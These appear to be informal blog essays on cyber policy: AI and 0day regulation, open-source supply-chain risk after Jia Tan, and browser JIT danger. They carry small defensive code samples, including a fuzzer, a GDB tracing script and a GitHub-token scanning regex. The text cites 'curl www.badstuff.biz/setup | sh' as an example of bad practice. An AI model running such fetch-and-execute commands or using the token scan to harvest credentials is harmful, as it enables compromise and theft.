Can a hamster do interprocedural analysis? What size of hamster can turn a
tier-2 geopolitical adversary's cyber force into a tier-1 adversary? Is the
best use of a hamster finding 0day or orchestrating the offensive
operations themselves? These are all great questions for policy teams to
ponder as they pontificate over how to properly regulate AI.
On one hand, as a technologist, your tendency will be to try to explain to
policy teams what makes a scary adversary scary, maybe get involved in
building a taxonomy of various tiers of adversary, start classifying
operations as "sophisticated" and "not sophisticated". This is not useful,
but it feels useful! It is like recycling cardboard boxes, all while
knowing that you, as an organism, are primarily oriented towards boiling
the oceans and turning the planet into Venus as quickly and efficiently as
possible. Remember that today's small stone crab claw is tomorrow's "extra
large" stone crab claw, because all the big ones got eaten and that's
how generational
amnesia
<https://www.natural-solutions.world/blog/how-can-we-stop-we-need-to-work-on…>
works!
In other words, while STORM-0558's operation against Microsoft was slick
like oil across the ever-hotter waters of the Gulf of Mexico when it
happened, the million teams doing the exact same Active Directory tricks
the next month were just small fish, despite their impact on targets. And
most big-impact operations could have been done by second-tier penetration
testing teams, let alone nation-state adversaries. You will, if you work in
Cyber Policy long enough, see people make tables of operations which
compare various hacks from over the last fifteen years, which is like
comparing the bite strength of a Cretaceous monster to that of your average
modern iguana.
Likewise, most of Policy-world is, like we all are, obsessed with 0day. We
like to count them with the enthusiasm of a vampire puppet on a children's
TV show! But we also know that finding 0day is not a sign of sophistication
so much as finding the right 0day at the right time. I don't know how to
classify Orange Tsai's PHP character innovation, but because it doesn't fit
neatly into a spreadsheet, it might as well not exist.
"If AI finds 0day, then it must be regulated" is a fun position to take in
the many fancy halls and tedious Zoom calls where a pompous attitude and an
ill-fitting suit are table stakes for attendance and having actually
written code that uses Huggingface is considered bad form. But regulating
technologies that can find 0day is a dead end. The current best way to find
0day is fuzzing, and the dumber the fuzzer, the better it works most of the
time. When it comes to operations, the current best way to hack is to email
people and ask them for their password? Is that still true? Or do we just
all look through huge databases of usernames and passwords that have
already leaked and just use those now? I'm sure AI can also do that, but
I'm also sure that it doesn't matter.
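To make the point concrete, here is a sketch of the kind of "dumb" fuzzer I mean - a mutational fuzzer with no coverage feedback and no grammar, just random bit flips on a known-good input. All names here are illustrative, not from any particular tool:

```python
import random

def mutate(sample: bytes, nflips: int = 8, seed=None) -> bytes:
    """Flip `nflips` random bits in a non-empty sample and return the mutant.

    This is the whole algorithm: no knowledge of the target format,
    no feedback loop. Feed the result to the target and watch for crashes.
    """
    rng = random.Random(seed)  # seedable so a crashing input is reproducible
    buf = bytearray(sample)
    for _ in range(nflips):
        i = rng.randrange(len(buf))       # pick a random byte
        buf[i] ^= 1 << rng.randrange(8)   # flip one of its eight bits
    return bytes(buf)
```

That's it - the entire "sophistication" of a tool family that has found a large fraction of all memory-safety bugs ever reported.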
I try to tell policy people this: What makes a scary adversary is huge
resources, huge motivation, and huge innovation. The big names will
probably use AI to automate different things, but nobody is going to saddle
up some hamsters and suddenly turn from a not-scary adversary into a scary
one.
-dave
People occasionally read my blogposts
<https://cybersecpolitics.blogspot.com/2024/04/what-open-source-projects-are…>
on Jia Tan
<https://cybersecpolitics.blogspot.com/2024/04/the-open-source-problem.html>
and then ask me about open source development in general, and you can only,
in your darkest heart of hearts (your only heart), laugh.
The other day I was contributing to a project that I am one of several
developers on. In particular, I wrote a GDB script that traces through a
function, printing out all the various variables and their sizes, and this
gets fed into an LLM to try to reason about it, which is a bit like asking
a hedgehog how big a Unicode string should be to fit around the moon, but
it was worth a shot, ya know? I have the kind of dyslexia that means I
can't tell matrix algebra from a thinking conscious creature.
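A minimal sketch of what a script like that can look like, using GDB's Python API. The command name `trace-locals` and the one-line-per-variable output format are my own inventions; the formatting helper is split out so it can be reasoned about outside of gdb:

```python
def fmt_var(name, typename, size, value):
    """One line per variable - a format an LLM can ingest easily."""
    return f"{name}: type={typename} size={size} value={value}"

try:
    import gdb  # the gdb module only exists inside a gdb process

    class TraceLocals(gdb.Command):
        """trace-locals: single-step the current function, dumping locals."""

        def __init__(self):
            super().__init__("trace-locals", gdb.COMMAND_USER)

        def invoke(self, arg, from_tty):
            start = gdb.selected_frame().function()
            # Keep stepping while we are still in the same function.
            while gdb.selected_frame().function() == start:
                block = gdb.selected_frame().block()
                for sym in block:
                    if sym.is_variable:
                        val = gdb.selected_frame().read_var(sym)
                        print(fmt_var(sym.name, str(sym.type),
                                      sym.type.sizeof, str(val)))
                gdb.execute("step", to_string=True)

    TraceLocals()
except ImportError:
    pass  # running outside gdb; only fmt_var is available
```

Load it with `source trace_locals.py` inside gdb, break on the function you care about, and run `trace-locals`; the printed lines become the LLM prompt.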
Anyways, while I am good at making GDB dance in particular ways, like
knowing the ancient art of the Polka, I am not good at modern software
development, and barely understand Git or Docker or Cloud things. But I
have hacked a few things, like y'all have, and so my development happens in
a VM and that VM has access to pretty much just the source code it needs
and not a whole lot else.
But that's not how modern development works. It's common to see
instructions to run "gcloud auth" and then walk through the web
authentication portal from Google so your current user can access cloud
buckets and APIs while testing or debugging your giant microservice. Like,
people are out there just raw dogging source code from random other open
source developers, with their local environment running tokens that give
them access to everything they could possibly need from their Google
account. People out there running curl www.badstuff.biz/setup | sh. People,
and by this I mean developers, are storing five thousand fine-grained
GitHub tokens in various text files on their hard drives because they can't
remember which one was which.
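If you want to see how bad your own machine is, a scan like this will tell you. The helper names are hypothetical, but the `ghp_` and `github_pat_` prefixes are GitHub's real, documented token formats:

```python
import re
from pathlib import Path

# Classic personal access tokens start with "ghp_" (36 chars after the
# prefix); fine-grained tokens start with "github_pat_".
TOKEN_RE = re.compile(r"\b(ghp_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9_]{22,})\b")

def find_tokens(text):
    """Return every token-looking string in a blob of text."""
    return TOKEN_RE.findall(text)

def scan(root):
    """Walk a directory tree and map file paths to the tokens found inside."""
    hits = {}
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        try:
            matches = find_tokens(path.read_text(errors="ignore"))
        except OSError:
            continue  # unreadable file; skip it
        if matches:
            hits[str(path)] = matches
    return hits
```

Run `scan` over your home directory and count how many of the hits you could actually name the purpose of.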
In other words: Jia Tan might have been a best case scenario for this
community.
-dave
I know it's in vogue to pick on enterprise hardware marketed as a way to
"Secure your OT Environment" but actually written in crayon in a language
made of all sharp edges like C or PHP, with some modules in COBOL for
spice. This is the "Critical Infrastructure" risk du jour, on a thousand
podcasts and panels, with *Volt Typhoon* in the canary seat, where once
only the "sophisticated threat" Mirai had root permissions.
As embarrassing as having random Iranian teenagers learn how to do systems
administration on random water plants in New Jersey is, it's *more*
humiliating to have systemic vulnerabilities right in front of you, have a
huge amount of government brain matter devoted to solving them, and yet not
make the obvious choice to turn off features that are bleeding us out.
And when you talk about market failure in Security you can't help but talk
about Web Browsers, both mobile and desktop. Web Browsing technology is in
everything - and includes a host of technologies too complicated to go
into here. One of the most interesting has been Just-in-Time (JIT)
compilation, which became popular as an exploitation technique (let's say)
in 2010
<http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Slides-v2.pdf> but
since then - for over a decade! - has been a bubbling septic font of
constant, systemic, untreated risk.
Proponents of having a JIT in your JavaScript engine say "Without this
kind of performance, you wouldn't be able to have GMail or Expedia!" Which
is not true on today's hardware (Turn on Edge Strict Security mode today
and you won't even notice it), and almost certainly not true on much older
hardware. The issue with JITs is visible to any hacker who has looked at
the code - whenever you have concepts like "Negative Zero
<https://googleprojectzero.blogspot.com/2020/09/jitsploitation-one.html>"
that have to be handled perfectly every time or else the attacker gets full
control of your computer, you are in an indefensible space.
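For the non-hackers: negative zero is a real IEEE-754 value that compares equal to positive zero while still behaving differently downstream - exactly the kind of corner a JIT optimizer has to model perfectly or introduce a type-confusion primitive. A Python illustration of the hazard:

```python
import math

neg, pos = -0.0, 0.0

# The comparison an optimizer "sees": the two values look identical...
assert neg == pos

# ...but the sign bit is still there, and it changes later results.
assert math.copysign(1.0, neg) == -1.0
assert math.atan2(0.0, neg) == math.pi  # vs. atan2(0.0, pos) == 0.0
assert str(neg) == "-0.0"

# An optimizer that folds -0.0 into 0.0 because "they're equal" has
# silently changed program behavior - in a JIT, that gap is exploitable.
```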
I would, in a perfect world, like us to be able to get ahead of systemic
problems. We have a rallying cry and a lot of signatories on a pledge, but
we need to turn it into clicky clicking on the configuration options that
turn these things off at the USG and Enterprise level, the same way we
banned Russian antivirus from having Ring0 in our enterprises, or
suspiciously cheap subsidized Chinese telecom boxes from serving all the
phone companies across the Midwest.
The issue with web browsers is not limited to JITs. A Secure By Design
approach to web browsing would mean that most sites would not have access
to large parts of the web browsing specification. We don't need to be
tracked by every website. They don't all need access to Geolocation or
Video or WebAssembly or any number of the other capabilities our web
browsers hand them, largely in order to allow the mass production of
targeted advertising.
If we've learned anything in the last decade, it is that the key phrase in
Targeted Advertising is "Targeted", and malware authors have known this for
as long as the ecosystem has existed. The reason your browser is insecure by
default is to support a parasitic advertising ecology, enhancing
shareholder value, but leaving our society defenceless against anyone
schooled enough in the dark arts.
Google's current solution to vulnerabilities in the browser is Yet Another
Sandbox. These work for a while until they don't - over time, digital
sandboxes get dirty and filled with secrets just like the one in your
backyard gets filled with presents from the local feral cat community. I
know Project Zero's Samuel Groß is better at browser hacking than I am, and
he personally designed the sandbox, but I look out across the landscape of
the Chinese hacking community and see only hungry vorpal blades and I do
not think it is a winning strategy.
-dave
References:
1. Microsoft's Strict mode turns the JIT off (kudos to Johnathan Norman)
https://support.microsoft.com/en-us/microsoft-edge/enhance-your-security-on…
2. The Sandbox: https://v8.dev/blog/sandbox